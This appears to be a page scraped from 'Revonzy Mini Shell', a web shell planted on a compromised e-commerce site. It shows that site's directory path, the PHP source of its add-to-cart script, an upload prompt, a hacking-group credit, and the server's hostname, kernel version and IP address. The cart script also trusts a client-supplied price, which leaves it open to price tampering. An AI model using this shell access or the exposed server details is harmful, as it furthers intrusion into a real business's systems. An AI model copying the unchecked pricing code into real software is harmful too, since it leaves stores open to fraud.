Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/balajimall.com/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/balajimall.com/add-cart-background.php

<?php
	require_once("lib/functions.php");	
	$db = new login_function();

	$current_session = session_id(); 
	
	if(isset($_POST['c_id']) AND isset($_POST['actual_price']))
	{
		$c_id			=	$_POST['c_id'];
		$actual_price	=	$_POST['actual_price'];
		$qty			=	$_POST['qnty'];
	
		$actual_price = $actual_price * $qty;
	
		$check_exist = $db->check_product_exist($current_session,$c_id);
	
		if($check_exist=="")
		{
			if($db->add_temp_cart($current_session,$c_id,$qty,$actual_price))
			{
				echo "success";
			}
			else
			{
				echo "failed";
			}
		}
		else
		{
			if($db->update_cart($current_session,$c_id,$qty,$actual_price))
			{
				echo "success";
			}
			else
			{
				echo "failed";
			}
		}
	}

?>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4